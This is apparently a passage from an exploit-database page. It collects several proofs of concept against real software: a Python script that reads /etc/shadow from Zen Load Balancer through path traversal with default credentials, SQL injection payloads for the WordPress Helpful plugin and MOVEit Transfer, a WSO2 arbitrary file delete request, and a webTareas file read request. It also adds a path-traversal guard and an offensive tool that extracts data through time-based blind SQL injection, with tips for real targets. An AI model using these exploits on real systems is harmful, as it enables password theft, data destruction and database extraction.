# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords.
# The request is sent with HTTP basic authentication (admin/admin below), i.e. the
# traversal is reachable by any user who can log in to the management interface.
#
# Impact:
# --------
# Successful exploitation could allow an attacker to obtain sensitive
# information.

import requests
import sys

# both the base URL and the file to read are required
if len(sys.argv) < 3:
    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
    sys.exit(-1)
else:
    files = sys.argv[2]
    url = sys.argv[1]
    with requests.Session() as s:
        urlz = url + "/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../" + files + "&nlines=100&action=See+logs"
        # the appliance uses a self-signed certificate, hence verify=False
        response = s.get(urlz, auth=('admin', 'admin'), verify=False)
        print(response.text)
-
WordPress Plugin Helpful 2.4.11 - SQL Injection
Title: Helpful 2.4.11 SQL Injection - WordPress Plugin
Version : 2.4.11
Software Link : https://wordpress.org/plugins/helpful/
Date of found: 10.04.2019
Author: Numan Türle

core/Core.class.php

// Ajax requests: pro
add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) );

// set args for insert command
$args = array(
    'post_id' => $_REQUEST['post_id'],
    'user'    => $_REQUEST['user'],
    'pro'     => $_REQUEST['pro'],
    'contra'  => $_REQUEST['contra']
);
$result = $this->insert( $args );

@params = 'post_id' => $_REQUEST['post_id'], call function insert -->

if( !$args['post_id'] ) return false;
$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id");

post_id is interpolated into the query unquoted and without $wpdb->prepare(), so a MySQL expression is accepted where a numeric ID is expected; the sleep() below makes the injection observable as a delay (time-based blind). The handler is registered on the wp_ajax_ hook, which WordPress only dispatches for logged-in users, so a WordPress account is needed unless the plugin also registers a wp_ajax_nopriv_ hook (not shown here).

Payload :
GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1
-
WSO2 3.1.0 - Arbitrary File Delete
# Title: WSO2 3.1.0 - Arbitrary File Delete
# Date: 2020-04-12
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Software link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A

Document Title:
===============
WSO2 API Manager (Delete Extension) Arbitrary File Delete (Path Traversal)
## CVE not assigned yet
## Security Update: https://apim.docs.wso2.com/en/latest/

Common Vulnerability Scoring System:
====================================
8.5

Affected Product(s):
====================
WSO2 API Manager Carbon Interface

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A remote arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI. It allows a remote attacker with a low-privileged account to issue authenticated requests that delete arbitrary files on the server.

The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` module, in the `extensionName` parameter that names the extension to delete. The parameter is appended to the registry extensions directory (`<CARBON_HOME>/repository/deployment/server/registryextensions`, as the error below shows) without being normalised or checked, so a crafted traversal string in `extensionName` deletes files outside that directory, such as configuration files or database (.db) files, via authenticated POST requests.

The security risk is estimated as High with a CVSS score of 8.5. Exploitation requires a low-privileged web-application user account and no user interaction. Successful exploitation results in loss of availability, integrity and confidentiality.

===============================
Error generated by the server when the file is not found (from the log file; this is what brought the issue to my attention):

[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\commons-dir
    at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.java:531) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisOperation.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(OutInAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.client.OperationClient.execute(OperationClient.java:149) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.removeExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.extensions.stub_4.7.13.jar:?]
    at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extensions.ui_4.7.13.jar:?]
    at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspService(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
    at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [tomcat_9.0.22.wso2v1.jar:?]

* Error displayed in the web browser, in the response body:

<script type="text/javascript">
CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
</script>

=============================
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp

Vulnerable Parameter(s):
[+] extensionName

Server version 3.0.0

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with a low-privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps below.

1- The attacker must have access to the Extension component (List, Add, Delete extensions)
2- The attacker uploads any file with a .jar extension
3- The attacker intercepts the delete request that follows and modifies the parameter with a traversal string. Relative to the base directory above, `extensionName=../../../../INSTALL.txt` resolves to `E:\api-wso2\INSTALL.txt`, i.e. a file in CARBON_HOME itself:

--- PoC Session Logs [POST] ---
POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache

extensionName=../../../../INSTALL.txt

---------------Returned Headers in Response------------------
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server
-
Webtateas 2.0 - Arbitrary File Read
# Exploit Title: webTareas 2.0 - Arbitrary File Read
# Date: 2020-04-12
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
# Software Link: http://webtareas.sourceforge.net/general/home.php
# Version: webTareas v2.0
# Tested on: Windows
# CVE : N/A

Vulnerable Request (sent with a logged-in webTareasSID session; the prefix and extpath parameters are joined into a file path without normalisation):

POST /webtareas/includes/general_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/home.php?
Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver
DNT: 1

action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini
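The four traversal entries above (TVT NVMS 1000, Zen Load Balancer `filelog`, WSO2 `extensionName`, webTareas `prefix`/`extpath`) all fail in the same way: a user-controlled name is joined onto a base directory without checking where the result lands. The following is an added example, Python written for this page and not code from any of those products, of the check that would have rejected every one of the page's payloads. `resolve_under()` accepts a relative name only if its resolved path is still inside the base directory; `bare_file_name()` is the stricter rule for a parameter that is supposed to name a single file, like WSO2's `extensionName`. BASE_DIR is a constructed path that does not need to exist, and the webTareas entry is the page's `prefix` and `extpath` concatenated.

```python
"""Path-traversal guard exercised against the page's own payloads. Added
example; BASE_DIR and the benign entry are constructed."""
import os
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a request path would leave the base directory."""


def resolve_under(base_dir: str, user_path: str) -> str:
    """Return the real path for user_path inside base_dir, or raise TraversalError."""
    # the web server has normally decoded %2F etc. once already; do the same
    candidate = unquote(user_path)
    # treat backslashes as separators so "..\\..\\" is caught on POSIX hosts too
    candidate = candidate.replace("\\", "/")
    base = os.path.realpath(base_dir)
    # realpath collapses "..", so "base/../../x" becomes "/x" before the check;
    # an absolute candidate simply replaces base in os.path.join and is caught too
    target = os.path.realpath(os.path.join(base, candidate))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:          # Windows: paths on different drive letters
        inside = False
    if not inside:
        raise TraversalError("%r escapes %s" % (user_path, base_dir))
    return target


def bare_file_name(name: str) -> bool:
    """Stricter rule for parameters that name one file (WSO2's extensionName):
    non-empty, not '.' or '..', and no path separators after decoding."""
    decoded = unquote(name).replace("\\", "/")
    return decoded not in ("", ".", "..") and "/" not in decoded


BASE_DIR = "/srv/app/registryextensions"     # constructed
PAYLOADS = {
    "tvt": "../../../../../../../../../../../../../windows/win.ini",
    "zen": "../../../../../../../../../../../../../../../../etc/shadow",
    "wso2": "../../../../INSTALL.txt",
    "webtareas": "..%2F" + "../../../../Windows/win.ini",   # prefix + extpath
    "benign": "logs/app.log",                               # constructed
}


def check_all(base_dir: str = BASE_DIR) -> dict:
    """Map each input name to True (accepted) or False (rejected)."""
    results = {}
    for name, value in PAYLOADS.items():
        try:
            resolve_under(base_dir, value)
            results[name] = True
        except TraversalError:
            results[name] = False
    return results
```

Both checks work on the decoded value, so a client cannot slip past them by encoding the slashes; a double-encoded `%252e%252e` decodes to the literal name `%2e%2e`, which is harmless because the filesystem never interprets it.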
-
MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
# Google Dork: inurl:human.aspx intext:moveit
# Date: 2020-04-12
# Exploit Authors: Aviv Beniash, Noam Moshe
# Vendor Homepage: https://www.ipswitch.com/
# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
# CVE : CVE-2019-16383
#
# Related Resources:
# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
# https://nvd.nist.gov/vuln/detail/CVE-2019-16383

# Description:
# The API call for revoking logon tokens is vulnerable to a
# time-based blind SQL injection via the 'token' parameter.
# The endpoint is reached before authentication, so no account is needed;
# a response delayed by ~10 seconds confirms the injection.

# MSSQL payload:

POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

token='; WAITFOR DELAY '0:0:10'--

# MySQL payload:

POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

token=' OR SLEEP(10);
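Both the Helpful `post_id=if(1=1,sleep(10),0)` payload and the MOVEit `token` payloads above only confirm the injection by a delay. The following is an added example, not code from either advisory, and it goes beyond them: it turns such a sleep-based oracle into extraction of a SQL expression's value, one character at a time, by binary search over the character's ASCII code. It assumes a hypothetical `send(payload)` callable that places the payload in the injectable parameter and blocks until the response arrives; `FakeMySQLTarget` is a constructed stand-in that evaluates the injected condition against canned values and sleeps when it holds, so the whole loop runs offline.

```python
"""Time-based blind SQL injection: from a sleep() oracle to data extraction.
Added example, not from the Helpful or MOVEit advisories; send() is assumed
and FakeMySQLTarget is constructed."""
import re
import time

SLEEP_SECONDS = 0.05   # use several seconds against a real target, as the PoCs do


def mysql_payload(condition: str, delay: float = SLEEP_SECONDS) -> str:
    """Numeric context, same shape as the Helpful post_id payload."""
    return "if(%s,sleep(%s),0)" % (condition, delay)


def mssql_payload(condition: str, delay: float = SLEEP_SECONDS) -> str:
    """Quoted-string context, same shape as the MOVEit token payload."""
    return "'; IF (%s) WAITFOR DELAY '0:0:%06.3f'--" % (condition, delay)


def make_timing_oracle(send, payload_builder=mysql_payload, threshold=None):
    """Return oracle(condition) -> True when the request took long enough for
    the injected sleep to have fired."""
    if threshold is None:
        threshold = SLEEP_SECONDS / 2.0

    def oracle(condition: str) -> bool:
        start = time.monotonic()
        send(payload_builder(condition))
        return time.monotonic() - start >= threshold
    return oracle


def extract_string(oracle, expression: str, max_len: int = 64) -> str:
    """Binary-search each character's ASCII code (7 probes per character);
    MySQL's ascii('') is 0 once the string is exhausted, which ends the loop."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("ascii(substring((%s),%d,1))>%d" % (expression, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


_PAYLOAD_RE = re.compile(r"if\((.*),sleep\(([\d.]+)\),0\)")
_COND_RE = re.compile(r"ascii\(substring\(\((.*)\),(\d+),1\)\)>(\d+)")


class FakeMySQLTarget:
    """Constructed vulnerable endpoint: evaluates the injected condition against
    canned values and sleeps when it holds, like the real backend would."""

    def __init__(self, values):
        self.values = values          # e.g. {"select user()": "wp@localhost"}
        self.requests = 0

    def send(self, payload: str) -> None:
        self.requests += 1
        p = _PAYLOAD_RE.fullmatch(payload)
        c = _COND_RE.fullmatch(p.group(1)) if p else None
        if c is None:
            return                    # anything else behaves like a benign value
        value = self.values[c.group(1)]
        pos, bound = int(c.group(2)), int(c.group(3))
        code = ord(value[pos - 1]) if pos <= len(value) else 0
        if code > bound:
            time.sleep(float(p.group(2)))
```

Against a real target the `send` passed to `make_timing_oracle` would be a function that issues the HTTP request from the advisory with the payload in `post_id` or `token`; raise `SLEEP_SECONDS` well above the network jitter, and measure a baseline with a false condition first so the threshold is not fooled by a slow server.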